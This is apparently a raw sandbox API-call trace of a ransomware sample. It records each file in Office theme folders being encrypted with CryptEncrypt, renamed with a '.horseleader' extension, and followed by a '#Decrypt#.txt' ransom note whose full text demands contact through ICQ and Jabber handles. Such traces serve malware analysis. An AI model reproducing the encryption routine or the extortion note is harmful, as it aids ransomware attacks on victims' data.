[0248.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.horseleader")) returned 1 [0248.030] GetProcessHeap () returned 0x780000 [0248.030] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.030] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab5b300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2ab5b300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x10af1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SPRING.ELM", cAlternateFileName="")) returned 1 [0248.030] lstrcmpiW (lpString1="SPRING.ELM", lpString2="Windows") returned -1 [0248.030] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM") returned 77 [0248.030] StrStrIW (lpFirst="SPRING.ELM", lpSrch=".horseleader") returned 0x0 [0248.031] lstrcmpW (lpString1="SPRING.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.031] lstrcmpW (lpString1="SPRING.ELM", lpString2="_uninstalling_.png") returned 1 [0248.031] lstrlenW (lpString=".testttjffg") returned 11 [0248.031] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM", lpSrch=".testttjffg") returned 0x0 [0248.031] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 
[0248.031] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.031] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.033] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM") returned 77 [0248.033] StrStrW (lpFirst="SPRING.ELM", lpSrch=".txt") returned 0x0 [0248.033] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=68337) returned 1 [0248.033] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.033] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.035] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.036] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.036] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5d78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.036] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.037] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbaf1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.037] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.038] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.038] CloseHandle (hObject=0x1a4) returned 1 [0248.038] GetProcessHeap () returned 0x780000 [0248.038] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.038] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM.horseleader") returned 89 [0248.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm.horseleader")) returned 1 [0248.042] GetProcessHeap () returned 0x780000 [0248.042] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.042] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1d2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SPRING.INF", cAlternateFileName="")) returned 1 [0248.042] lstrcmpiW (lpString1="SPRING.INF", lpString2="Windows") returned -1 [0248.042] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF") returned 77 [0248.042] StrStrIW (lpFirst="SPRING.INF", lpSrch=".horseleader") returned 0x0 [0248.042] lstrcmpW (lpString1="SPRING.INF", lpString2="#Decrypt#.txt") returned 1 [0248.042] lstrcmpW (lpString1="SPRING.INF", lpString2="_uninstalling_.png") returned 1 [0248.043] lstrlenW (lpString=".testttjffg") returned 11 
[0248.043] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF", lpSrch=".testttjffg") returned 0x0 [0248.043] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.043] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF") returned 77 [0248.044] StrStrW (lpFirst="SPRING.INF", lpSrch=".txt") returned 0x0 [0248.044] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=466) returned 1 [0248.045] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1d2, lpOverlapped=0x0) returned 1 [0248.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.046] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1d2, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1d2, lpOverlapped=0x0) returned 1 [0248.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.046] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.047] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.047] CloseHandle (hObject=0x1a4) returned 1 [0248.047] GetProcessHeap () returned 0x780000 [0248.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.047] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF.horseleader") returned 89 [0248.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf.horseleader")) returned 1 [0248.049] GetProcessHeap () returned 0x780000 [0248.049] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.049] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c45, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.049] lstrcmpiW 
(lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.049] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 79 [0248.050] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.050] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.050] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.050] lstrlenW (lpString=".testttjffg") returned 11 [0248.050] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.050] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.050] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.050] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.056] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 79 [0248.056] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.056] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19525) returned 1 [0248.056] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4c45, lpOverlapped=0x0) returned 1 [0248.058] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb3bb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.058] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4c45, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4c45, lpOverlapped=0x0) returned 1 [0248.059] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.059] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.059] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.059] CloseHandle (hObject=0x1a4) returned 1 [0248.062] GetProcessHeap () returned 0x780000 [0248.062] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.062] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.horseleader") returned 91 [0248.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.horseleader")) returned 1 [0248.064] GetProcessHeap () returned 0x780000 [0248.064] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: 
hHeap=0x780000) returned 1 [0248.064] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c45, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.064] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.064] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\#Decrypt#.txt") returned 80 [0248.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.065] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.065] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.066] lstrlenA (lpString="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") returned 1368 [0248.066] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.067] CloseHandle (hObject=0x158) returned 1 [0248.067] GetProcessHeap () returned 0x780000 [0248.067] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.067] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="STRTEDGE", cAlternateFileName="")) returned 1 [0248.067] lstrcmpiW (lpString1="STRTEDGE", lpString2="Windows") returned -1 [0248.067] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE") returned 68 [0248.067] lstrcmpW (lpString1="STRTEDGE", lpString2=".") returned 1 [0248.067] lstrcmpW (lpString1="STRTEDGE", lpString2="..") returned 1 [0248.067] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.067] GetProcessHeap () returned 0x780000 [0248.067] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.067] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*") returned 70 [0248.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.069] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.069] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\.") returned 70 [0248.069] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.069] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.069] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.069] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\..") returned 71 [0248.069] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0248.069] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.069] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6c9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.069] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.069] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 80 [0248.069] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.069] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.069] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.069] lstrlenW (lpString=".testttjffg") returned 11 [0248.070] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.070] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.070] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
